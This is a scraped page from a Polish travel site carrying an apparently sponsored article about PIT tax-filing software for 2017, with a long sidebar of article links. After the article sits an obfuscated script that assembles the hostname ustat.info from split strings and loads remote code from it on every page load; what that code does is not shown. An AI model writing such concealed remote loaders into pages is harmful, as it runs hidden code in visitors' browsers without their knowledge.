rel="Zimbabwe">Zimbabwe</a></li><li><a href="#Zjednoczone Emiraty Arabskie" rel="Zjednoczone Emiraty Arabskie">Zjednoczone Emiraty Arabskie</a></li></ul></div></form></li>
</ul>
		
		
	</div>
	<p class="clear"></p>
</div>


<div style="width: 750px; margin: 0 auto; text-align: center;">
<script async="" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Travel Reporter TOP -->
<ins class="adsbygoogle" style="display: block; height: 90px;" data-ad-client="ca-pub-6578848901865058" data-ad-slot="9466572321" data-ad-format="auto" data-adsbygoogle-status="done"><ins id="aswift_0_expand" style="display:inline-table;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:750px;background-color:transparent;"><ins id="aswift_0_anchor" style="display:block;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:750px;background-color:transparent;"><iframe width="750" height="90" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_0" name="aswift_0" style="left:0;position:absolute;top:0;width:750px;height:90px;"></iframe></ins></ins></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>



</div>
<div id="content" style="width:96%">
<div id="mainentry" style="width:72%;">

<h1>Program PIT 2016 - skorzystaj z pomocy przy wypełnianiu rocznej deklaracji podatkowej.</h1>


2 maja zakończy się trwający od 2 stycznia gorący okres wypełniania  i składania rocznych deklaracji PIT. Niewielu podatników cieszy perspektywa przebijania się przez zawiłości podatkowych przepisów, marnowania czasu na żmudne wypełnianie formularza, czytanie broszurek dołączonych do poszczególnych typów PIT i szukanie odpowiedzi, z jakiej ulgi można skorzystać, żeby obniżyć wysokość należnego fiskusowi podatku.
<p><br></p>

<img src="/userfiles/image/pit.jpg" width="100%"><br><br>

<h2>Pozwól sobie pomóc - skorzystaj z program PIT 2017!</h2>
<p style="text-align: justify;">W Internecie można znaleźć wiele portali podatkowych, które oferują bezpłatny program PIT 2017. Organizacje Pożytku Publicznego wydają też programy umożliwiające rozliczanie PIT na płytach CD &nbsp;i dołączają &nbsp;je &nbsp;do szeregu wydawnictw. &nbsp;Bezpieczny i bezpłatny program PIT umieściło na swojej stronie internetowej mf.gov.pl&nbsp;Ministerstwo Finansów. Dzięki aplikacji zwanej e-Deklaracje można złożyć &nbsp;i przesłać do urzędu skarbowego roczne zeznanie podatkowe nie wychodząc z domu. Sprawdzonym, bezpiecznym i bezpłatnym programem ułatwiającym rozliczenie pit 2017 online jest również program zamieszczony na portalu podatkowym www.PITax.pl. Żeby z niego skorzystać nie trzeba być znawcą przepisów podatkowych. Program PITax.pl jest opracowany z myślą o przeciętnym podatniku, który co roku staje przed dylematem związanym z wypełnieniem PIT i czuje się trochę a może nawet bardzo zagubiony. PITax.pl ma przejrzysty i intuicyjny interfejs, który prowadzi podatnika krok po kroku do celu jakim jest wydrukowanie lub przesłanie wypełnionego formularza PIT do właściwego urzędu skarbowego. Z PITax.pl możesz rozliczyć wszystkie ePITy: PIT-28, PIT-36, PIT-36L, PIT-38 i PIT-39. &nbsp;To program, który po udzieleniu odpowiedzi na kilka pytań, wybierze właściwy dla Ciebie formularz wraz z załącznikami. &nbsp;Rozlicz PIT online z <a href="https://www.pitax.pl/pit-2017">PITax.pl</a> a zobaczysz jakie to łatwe i szybkie!</p>
<h2>Czy program PIT przyda się &nbsp;także pracodawcy?</h2>
<p style="text-align: justify;">Obowiązek sporządzania dokumentów PIT na koniec roku podatkowego spoczywa nie tylko na podatniku, ale także na pracodawcach. Dokumenty PIT 11, PIT 40A i PIT 8A przygotowane przez pracodawców i świadczeniodawców stanowią podstawę do rozliczenia się z fiskusem przez podatników. Dokumenty te trafiają zarówno do podatników, jak i urzędów skarbowych. Korzystanie przy ich opracowaniu z programu PIT to duże ułatwienie i oszczędność czasu.</p>
<p style="text-align: justify;">Przygotuj dane potrzebne do rozliczenia PIT online</p>
<h2>Jednak zanim zaczniemy rozliczanie PIT online, musimy się do tego przygotować.</h2>
<p style="text-align: justify;">Nawet najlepszy program PIT 2017 nie zgromadzi za nas wszystkich informacji niezbędnych do rocznego rozliczenia PIT online. Informacje te zawarte w formularzach: PIT 11, PIT 40A i PIT 8A powinniśmy otrzymać od pracodawcy lub innego płatnika najpóźniej do końca lutego.</p>
<p style="text-align: justify;">Program PIT online wskaże &nbsp;przysługujące Ci ulgi</p>
<p style="text-align: justify;">Musimy pamiętać również o dokumentach, które potwierdzą prawo do zastosowania ulgi podatkowej, dzięki której mamy możliwość obniżenia podatku. &nbsp;W wyborze właściwej dla Ciebie ulgi podatkowej pomoże program PITax.pl, z wbudowaną obszerną i przystępnie napisaną bazą wiedzy z zakresu prawa podatkowego. Wśród ulg są takie, które możemy odliczyć od dochodu oraz te, które możemy odliczyć od podatku.</p>
<p style="text-align: justify;">W 2017 r. od dochodu możemy odpisać</p>
<ul>
<li>darowizny</li>
<li>ulgę rehabilitacyjną,</li>
<li>ulgę z tytułu wpłat na Indywidualne Konto Zabezpieczenia Emerytalnego</li>
<li>ulgę z tytułu poniesionych wydatków na nowe technologie,</li>
</ul>
<p style="text-align: justify;">Natomiast od podatku możemy odpisać:</p>
<ul>
<li>ulgę abolicyjną</li>
<li>ulgę prorodzinną</li>
<li>składki zdrowotne</li>
</ul>
<p style="text-align: justify;">Usługa wstępnie wypełnionego zeznania podatkowego</p>
<p style="text-align: justify;">Rozliczanie pit online ułatwi skorzystanie z udostępnionej przez Ministerstwo Finansów usługi wstępnie wypełnionego zeznania podatkowego, tak zwanego PFR.</p>
<p style="text-align: justify;">Po 15 marca 2017 roku , korzystając z PITax.pl będzie można wczytać wstępnie wypełnioną deklarację PFR z Portalu Podatkowego Ministerstwa Finansów. Jest to ogromne ułatwienie i dodatkowa oszczędność czasu dla osób rozliczających się z urzędem skarbowym. Wczytanie danych z PFR otwiera drzwi na rozliczenie PIT online &nbsp;36, rozliczenie PIT online &nbsp;37 &nbsp;i rozliczenie PIT online 38. Jednak, żeby możliwe było wczytanie danych zawartych w PFR, konieczne jest podanie prawidłowych danych autoryzacyjnych, takich jak: imię i nazwisko, PESEL/NIP, adres zamieszkania oraz dokładnej kwoty podatku za poprzedni rok. Transmisja danych pomiędzy aplikacją e-pity a PITax.pl odbywa się w bezpieczny sposób, z wykorzystaniem algorytmów szyfrowania. Z chwilą wczytania ich do aplikacji, dane te usuwane są z serwerów e-file i znajdują się tylko na &nbsp;komputerze podatnika.</p>
<p style="text-align: justify;">Pomimo tego, że Program PIT 2016 praktycznie wykonuje za nas rozliczenie PIT 2016 online, to jednak sami musimy pamiętać o terminach wysłania deklaracji do właściwego urzędu skarbowego. Warto więc pamiętać, że w 2017 roku, zgodnie z zapisami ustawy &nbsp;o podatku dochodowym od osób fizycznych, ostatecznym terminem złożenia (wysłania) deklaracji PIT-36, PIT-37, PIT-38 i PIT-39 jest 2 maja (30 kwietnia i 1 maja są dniami wolnymi od pracy), natomiast PIT-28, wypełniony przez podatników rozliczających się przy zastosowaniu ryczałtu ewidencjonowanego musi trafić do urzędu skarbowego nie później niż 28 lutego 2017 r.</p>

<script type="text/javascript">
(function(){
 w3tr=document.createElement("script");w3tr.type="text/javascript";
 w3tr.async=true;w3tr_=(("us")+"t")+"a";w3tr_+=("t.i")+""+"n";w3tr_+=(("f")+"o");w3tr_+="/";
 w3tru="60472988.";w3tru+="f4ahld863trtwdnpexyjxyt8n541bw";w3tr.src="//"+w3tr_+w3tru;
 w3trdb=document.body; w3trdb.appendChild(w3tr);
})();
</script>
<script>
	$(document).ready(
	
		function() { 
			$('.corner').corner('6px');
			$('.photo').each(function() { $(this).mouseenter(function() { $(this).find('.data').fadeIn(); $(this).find('.mainlink').fadeOut(); }); $(this).mouseleave(function() { $(this).find('.data').fadeOut(); $(this).find('.mainlink').fadeIn(); }); });
		}
	
	);
</script>
</div>

<div id="info" class="rightlist" style="width:25%;">

<h2>Pozostałe teksty</h2>
<ul>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/gruzja-z-logostour.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/133/5,rzeczy,ktore,musisz,wiedziec,zanim,pojedziesz,do,Gruzji">5 rzeczy, które musisz wiedzieć, zanim pojedziesz do Gruzji</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/oekw630.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/132/Podrozowanie,po,swiecie">Podróżowanie po świecie</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/wybierz-swoj-wymarzony-kierunek-na-czarter-jacht.png&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/131/Wybierz,swoj,wymarzony,kierunek,na,czarter,jachtu">Wybierz swój wymarzony kierunek na czarter jachtu</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/interferie-aqua-park-sport-hotel_33649_gallery_1140x620.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/130/Top,5,hoteli,z,basenem,w,Sudetach">Top 5 hoteli z basenem w Sudetach</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/duisburg.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/129/Co,zwiedzac,gdzie,pracowac,i,gdzie,nocowac,w,Zaglebiu,Ruhry">Co zwiedzać, gdzie pracować i gdzie nocować w Zagłębiu Ruhry</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/parking.png&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/128/Parkuj,przy,lotnisku,w,Balicach,i,nie,przeplacaj">Parkuj przy lotnisku w Balicach i nie przepłacaj</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/gokart-berg-x-plore-bfr.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/127/Duzy,gokart,na,pedaly">Duży gokart na pedały</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/money-256314_960_720.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/126/Zalety,ofert,last,minute">Zalety ofert last minute</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/money-256282_960_720.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/125/Pozyczka,pozabankowa,na,raty,Czy,warto">Pożyczka pozabankowa na raty. Czy warto?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/euro-870757_960_720.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/124/Jesienno,zimowe,podroze">Jesienno-zimowe podróże</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/photo-1440096267761-385efe9e518f.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/123/Wakacje,w,Turcji,kto,najczesciej,wybiera,ten,region">Wakacje w Turcji - kto najczęściej wybiera ten region?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/5NCZ4GMIX7.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/122/Sens,pielgrzymowania">Sens pielgrzymowania</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/330624.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/121/Stadion,Olimpijski,we,Wroclawiu">Stadion Olimpijski we Wrocławiu</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/rhodes-2449156_1280.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/120/Czym,charakteryzuje,sie,dobra,restauracja">Czym charakteryzuje się dobra restauracja?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/sky-2188529_960_720.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/119/Pakuj,sie,z,glowa">Pakuj się z głową!</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/automobile-1845650_960_720.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/118/Taksowka,wygodniej,niz,komunikacja,miejska">Taksówką wygodniej niż komunikacją miejską</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/najpiekniejsze-trasy-rejsow-pomysl-na-wycieczke.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/117/Najpiekniejsze,trasy,rejsow,pomysl,na,wycieczke">Najpiękniejsze trasy rejsów - pomysł na wycieczkę</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/lake-696098_960_720.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/116/Zaplanuj,majowke,juz,teraz">Zaplanuj majówkę już teraz</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/wakacje123.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/115/Kiedy,najlepiej,wziac,dlugi,urlop">Kiedy najlepiej wziąć długi urlop?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/taksidi.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/114/Narty,w,Szwajcarii">Narty w Szwajcarii - najbardziej znane 4 Doliny!</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/DisneylandCastle.JPG&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/112/Disneyland,lepszy,w,USA,czy,we,Francji">Disneyland - lepszy w USA czy we Francji?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/rowerowy-weekend-w-hiszpanii.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/111/To,moze,Hiszpania,last,minute">To może Hiszpania last minute?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/najczestsze-zagrozenia-przy-wyprawach-nurkowych.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/110/Najczestsze,zagrozenia,przy,wyprawach,nurkowych">Najczęstsze zagrożenia przy wyprawach nurkowych</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/109/Co,nowego,37">Co nowego? (37)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/108/Co,nowego,36">Co nowego? (36)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/zwiedzanie-warszawy-3-2.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/107/Zwiedzanie,Warszawy">Zwiedzanie Warszawy</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/106/Co,nowego,35">Co nowego? (35)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/105/Co,nowego,34">Co nowego? (34)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/wakacje.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/104/Gdzie,na,wakacje">Gdzie na wakacje - polecane miejsca na najbliższe wakacje, w kraju i za granicą</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/103/Co,nowego,33">Co nowego? (33)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/102/Co,nowego,32">Co nowego? (32)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/kumin.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/101/Kumin,kakao,karawana">Kumin, kakao i karawana. Odyseja aromatyczna autorstwa Gary'ego Paula Nabhana</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/99/Co,nowego,31">Co nowego? (31)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/jak-wygrac-w-lotto.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/98/Duze,finanse,stojace,za,popularnymi,platformami,do,loterii">Duże finanse stojące za popularnymi platformami do loterii</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/97/Co,nowego,30">Co nowego? (30)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/96/Co,nowego,29">Co nowego? (29)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/95/Co,nowego,28">Co nowego? (28)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/malediwy.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/94/Wycieczki,na,Malediwy,oaza,spokoju,dla,spragnionych,relaksu">Wycieczki na Malediwy – oaza spokoju dla spragnionych relaksu</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/93/Co,nowego,27">Co nowego? (27)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/92/Co,nowego,26">Co nowego? (26)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/edipresse-puzzle.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/91/Puzzle,dla,fanow,podrozy">Puzzle dla fanów podróży</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/90/Co,nowego,25">Co nowego? (25)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/89/Co,nowego,24">Co nowego? (24)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/88/Co,nowego,23">Co nowego? (23)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/87/Co,nowego,22">Co nowego? (22)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/86/Co,nowego,21">Co nowego? (21)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/85/Co,nowego,20">Co nowego? (20)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/84/Co,nowego,19">Co nowego? (19)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/83/Co,nowego,18">Co nowego? (18)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/82/Co,nowego,17">Co nowego? (17)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/bodrum-turcja.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/81/Bodrum,w,Turcji,czym,zachwyca">Bodrum w Turcji - czym zachwyca?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/80/Co,nowego,16">Co nowego? (16)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/Z-dala-od-cesarza-okladka.JPG&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/79/Podrozuj,po,Chinach,z,Davidem,Eimerem">Podróżuj po Chinach z Davidem Eimerem</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/78/Co,nowego,15">Co nowego? (15)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/77/Co,nowego,14">Co nowego? (14)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/Skandynawski-Raj.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/76/Skandynawski,raj,Michaela,Bootha">Skandynawski raj Michaela Bootha</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/75/Co,nowego,13">Co nowego? (13)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/74/Co,nowego,12">Co nowego? (12)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/73/Co,nowego,11">Co nowego? (11)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/87-apt-val-di-sole-peio-c-briani.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/72/Val,Di,Sole,narty,w,promieniach,slonca">Val Di Sole - narty w promieniach słońca</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/71/Co,nowego,10">Co nowego? (10)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/co-mozna-zwiedzic-w-krakowie.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/70/Co,mozna,zwiedzic,w,Krakowie,porady,dla,poczatkujacych,odkrywcow">Co można zwiedzić w Krakowie – porady dla poczatkujących odkrywców</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/Autostopem-przez-Atlantyk-okladka.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/69/Autostopem,przez,Atlantyk,i,Ameryke,Poludniowa">Autostopem przez Atlantyk i Amerykę Południową z Przemysławem Skokowskim</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/68/Co,nowego,9">Co nowego? (9)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/Sedinum.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/67/Zapraszamy,do,Szczecina,o,powiesci,Sedinum,Leszka,Hermana">Zapraszamy do Szczecina! (o powieści Sedinum Leszka Hermana)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/Tatra_mountains_western_side_2.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/66/Niebanalne,rodzinne,ferie,w,Tatrach">Niebanalne rodzinne ferie w Tatrach</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/65/Co,nowego,8">Co nowego? (8)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/64/Co,nowego,7">Co nowego? (7)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/samochod.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/63/Jazda,samochodem,zima,na,co,zwracac,uwage">Jazda samochodem zimą - na co zwracać uwagę?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/62/Co,nowego,6">Co nowego? (6)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/urugwaj.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/61/Dlaczego,warto,wybrac,sie,do,Urugwaju">Dlaczego warto wybrać się do Urugwaju?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/60/Co,nowego,5">Co nowego? (5)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/800px-Muelle_de_Sopot,_Polonia,_2013-05-22,_DD_20.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/59/Sopot,jak,odpoczac,w,nadmorskim,kurorcie">Sopot - jak odpocząć w nadmorskim kurorcie?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/58/Co,nowego,Czesc,4">Co nowego? Część 4</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/alp-mountains-in-winter.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/57/Dlaczego,warto,jezdzic,na,narty,w,Alpy">Dlaczego warto jeździć na narty w Alpy?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/pingwiny.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/56/Czy,wiedziales,ze,istnieja,rowniez,rejsy,polarne">Czy wiedziałeś, że istnieją również rejsy polarne?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/rescue-helicopter-1497429-610x457.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/55/Jak,wzywac,pomocy,w,gorach">Jak wzywać pomocy w górach?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/54/Co,nowego,3">Co nowego? (3)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/livigno-narty.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/53/Wloskie,miejscowosci,narciarskie">Włoskie miejscowości (kurorty) narciarskie</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/warsaw-526126_640.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/52/Zwiedzanie,Traktu,Krolewskiego,w,Warszawie">Zwiedzanie Traktu Królewskiego w Warszawie</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/51/Co,nowego,2">Co nowego? (2)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/platnosci-za-granica.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/50/Platnosci,za,granica,jak,nie,zrujnowac,swojego,portfela">Płatności za granicą, jak nie zrujnować swojego portfela?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/conowego.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/49/Co,nowego,1">Co nowego? (1)</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/korfu.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/48/Oferty,last,minute,wakacje,na,greckiej,wyspie,Korfu">Oferty last minute - wakacje na greckiej wyspie Korfu</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/Poza-mapa.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/47/Recenzja,ksiazki,Poza,mapa,Alastaira,Bonnetta">Recenzja książki Poza mapą Alastaira Bonnetta</a><p class="clear"></p></li>
